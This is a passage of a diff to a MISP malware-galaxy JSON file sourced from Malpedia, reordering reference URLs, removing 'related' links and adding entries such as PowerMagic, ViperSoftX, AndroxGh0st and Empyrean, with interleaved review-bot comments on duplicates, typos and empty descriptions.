- "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"
+ "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/",
+ "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/"
],
"synonyms": [],
"type": []
@@ -9746,11 +10240,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://vblocalhost.com/uploads/VB2020-46.pdf",
- "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf"
+ "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [
"BoBoStealer"
@@ -9778,13 +10272,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode",
+ "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities",
"https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/",
- "https://www.certego.net/en/news/malware-tales-ftcode/",
- "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/",
- "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md",
- "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities"
+ "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm",
+ "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/",
+ "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
+ "https://www.certego.net/en/news/malware-tales-ftcode/"
],
"synonyms": [],
"type": []
@@ -9797,22 +10291,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/",
"https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless"
+ "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "0a339826-d5f8-11e8-b520-5b93fe65a08e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0db05333-2214-49c3-b469-927788932aaa",
"value": "GhostMiner"
},
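Review bot: the `"related"` block for GhostMiner, which linked this entry to `dest-uuid` `0a339826-d5f8-11e8-b520-5b93fe65a08e` with a `"type": "similar"` relation and an `estimative-language:likelihood-probability="almost-certain"` tag, is dropped here without anything in the hunk explaining why; the same removal happens for JasperLoader (`d8de6b56-...`) and PowerSpritz (`5629bc84-...`) further down. If the generator no longer emits cross-galaxy relations, that should be stated in the commit message, and if the relations were hand-maintained they should be preserved, since consumers that pivot between galaxies by `related` will silently lose these links.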
@@ -9821,23 +10306,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader",
- "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html",
+ "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html",
"https://blog.threatstop.com/upgraded-jasperloader-infecting-machines",
"https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html"
+ "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "286a14a1-7113-4bed-97ce-8db41b312a51",
"value": "JasperLoader"
},
@@ -9873,11 +10349,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus",
- "https://isc.sans.edu/diary/rss/28628",
- "https://github.com/mhaskar/Octopus",
- "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://isc.sans.edu/diary/26918"
+ "https://github.com/mhaskar/Octopus",
+ "https://isc.sans.edu/diary/26918",
+ "https://isc.sans.edu/diary/rss/28628",
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf"
],
"synonyms": [],
"type": []
@@ -9890,9 +10366,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19",
"https://threatpost.com/oilrig-apt-unique-backdoor/157646/",
- "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html",
- "https://twitter.com/MJDutch/status/1074820959784321026?s=19"
+ "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html"
],
"synonyms": [],
"type": []
@@ -9905,8 +10381,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy",
- "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html",
- "https://github.com/matthewdunwoody/POSHSPY"
+ "https://github.com/matthewdunwoody/POSHSPY",
+ "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
],
"synonyms": [],
"type": []
@@ -9933,8 +10409,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper",
- "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/",
- "https://twitter.com/InQuest/status/1285295975347650562"
+ "https://twitter.com/InQuest/status/1285295975347650562",
+ "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/"
],
"synonyms": [],
"type": []
@@ -9947,8 +10423,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
@@ -10000,14 +10476,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower",
- "https://attack.mitre.org/groups/G0100/",
- "https://securelist.com/recent-cloud-atlas-activity/92016/",
- "https://attack.mitre.org/groups/G0100",
- "https://securelist.com/recent-cloud-atlas-activity/92016",
- "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
"https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability",
+ "https://attack.mitre.org/groups/G0100",
+ "https://unit42.paloaltonetworks.com/atoms/clean-ursa/",
+ "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "https://attack.mitre.org/groups/G0100/",
"https://unit42.paloaltonetworks.com/atoms/clean-ursa",
- "https://unit42.paloaltonetworks.com/atoms/clean-ursa/"
+ "https://securelist.com/recent-cloud-atlas-activity/92016",
+ "https://securelist.com/recent-cloud-atlas-activity/92016/"
],
"synonyms": [],
"type": []
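Review bot: the PowerShower `refs` still contain near-duplicates that differ only by a trailing slash: `https://attack.mitre.org/groups/G0100` and `https://attack.mitre.org/groups/G0100/`, both `securelist.com/recent-cloud-atlas-activity/92016` variants, both `unit42-inception-attackers-target-europe-...` variants and both `atoms/clean-ursa` variants. The reorder moves them around but does not collapse them; the G0100 pair also survives in the LaZagne hunk at the end of this patch. Suggest normalising URLs (strip the trailing slash, or compare with it stripped) when deduplicating `refs` during import so each source appears once.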
@@ -10020,8 +10496,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
@@ -10040,15 +10516,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5629bc84-58eb-42d9-adc6-cd0eeb08ccaf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c07f6484-0669-44b7-90e6-f642e316d277",
"value": "PowerSpritz"
},
@@ -10057,25 +10524,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats",
- "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
- "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
- "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
"http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
- "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
- "https://blog.prevailion.com/2020/01/summer-mirage.html",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/",
- "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
"https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/",
- "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
"https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://unit42.paloaltonetworks.com/atoms/boggyserpens/",
+ "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
+ "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://blog.prevailion.com/2020/01/summer-mirage.html",
+ "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/"
],
"synonyms": [
"Valyria"
@@ -10090,13 +10557,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://www.symantec.com/security-center/writeup/2019-062513-4935-99",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
- "https://norfolkinfosec.com/apt33-powershell-malware/",
+ "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/",
"https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/"
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://norfolkinfosec.com/apt33-powershell-malware/"
],
"synonyms": [],
"type": []
@@ -10143,23 +10610,36 @@
"uuid": "f5fa77e9-9851-48a6-864d-e0448de062d4",
"value": "PowerZure"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic",
+ "https://securelist.com/bad-magic-apt/109087/?s=31"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7ee51054-1d3b-45ec-a7fd-1e212c891b99",
+ "value": "PowerMagic"
+ },
{
"description": "DLL loader that decrypts and runs a powershell-based downloader.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
- "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
- "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
- "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant",
- "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
- "https://unit42.paloaltonetworks.com/thanos-ransomware/",
"https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east"
+ "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
+ "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf",
+ "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/",
+ "https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
],
"synonyms": [],
"type": []
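Review bot: the new PowerMagic cluster is added with `"description": ""`, and its second reference `https://securelist.com/bad-magic-apt/109087/?s=31` carries what looks like a tracking query parameter. Suggest stripping `?s=31` so the URL matches the canonical Securelist link (and deduplicates against any future import of the same post), and, if the import can pull it, populating the description from the Malpedia entry so the cluster is useful in the MISP UI. The ViperSoftX entry added later in this patch has the same empty description.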
@@ -10199,11 +10679,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
+ "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html",
"https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
- "https://youtu.be/pBDu8EGWRC4?t=2492",
"https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html"
+ "https://youtu.be/pBDu8EGWRC4?t=2492",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -10229,8 +10709,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin",
- "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/",
+ "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/",
"https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca"
],
"synonyms": [],
@@ -10270,19 +10750,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload",
- "https://blog.minerva-labs.com/sload-targeting-europe-again",
"https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
- "https://threatpost.com/sload-spying-payload-delivery-bits/151120/",
- "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
- "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
- "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/",
"https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
"https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
+ "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
+ "https://threatpost.com/sload-spying-payload-delivery-bits/151120/",
+ "https://blog.minerva-labs.com/sload-targeting-europe-again",
"https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan",
- "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/"
+ "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
+ "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
+ "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
+ "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/"
],
"synonyms": [
"Starslord"
@@ -10297,8 +10777,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy",
- "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/",
- "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/"
+ "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/",
+ "https://unit42.paloaltonetworks.com/atoms/hunter-serpens/"
],
"synonyms": [],
"type": []
@@ -10363,8 +10843,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
- "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/"
+ "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/"
],
"synonyms": [],
"type": []
@@ -10385,17 +10865,30 @@
"uuid": "709ba4ad-9ec5-4e0b-b642-96db3b7f6898",
"value": "Unidentified PS 003 (RAT)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx",
+ "https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "15b551ea-b59a-40f9-a10f-6144415d2d5c",
+ "value": "ViperSoftX"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine",
- "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/",
- "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
- "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
"https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/",
"https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry",
- "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf"
+ "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/",
+ "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/",
+ "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf",
+ "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/"
],
"synonyms": [],
"type": []
@@ -10429,6 +10922,22 @@
"uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
"value": "WMImplant"
},
+ {
+ "description": "According to Laceworks, this is a SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.androxgh0st",
+ "https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/"
+ ],
+ "synonyms": [
+ "Androx",
+ "AndroxGhost"
+ ],
+ "type": []
+ },
+ "uuid": "e8f24c9c-c03c-4740-a121-d73789931c8e",
+ "value": "AndroxGh0st"
+ },
{
"description": "",
"meta": {
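Review bot: the AndroxGh0st description opens with "According to Laceworks", but the vendor cited in the reference URL (`https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/`) is Lacework, so the name should be corrected; "a SMTP cracker" should also read "an SMTP cracker". Since this text is generated from the upstream Malpedia entry, the fix likely belongs upstream rather than in this JSON, but it is worth flagging so the next regeneration does not reintroduce it.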
@@ -10460,13 +10969,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot",
- "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
- "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
"https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
- "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/"
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
+ "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/"
],
"synonyms": [],
"type": []
@@ -10487,6 +10996,19 @@
"uuid": "53dd4a8b-374e-48b6-a7c8-58af0e31f435",
"value": "DropboxC2C"
},
+ {
+ "description": "Discord Stealer written in Python with Javascript-based inject files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.empyrean",
+ "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b1aa0be3-b725-4135-b0b9-3a895d4ef047",
+ "value": "Empyrean"
+ },
{
"description": "According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.",
"meta": {
@@ -10519,28 +11041,21 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne",
"https://github.com/AlessandroZ/LaZagne",
- "https://attack.mitre.org/groups/G0100/",
- "https://attack.mitre.org/groups/G0100",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://attack.mitre.org/groups/G0100/",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://attack.mitre.org/groups/G0100",
+ "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.infinitumit.com.tr/apt-35/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d0394d50-5316-4405-aa77-1070bdf68b6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c752f295-7f08-4cb0-92d5-a0c562abd08c",
"value": "LaZagne"
},
@@ -10577,19 +11092,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph",
- "https://github.com/lacework/lacework-labs/tree/master/keksec",
- "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
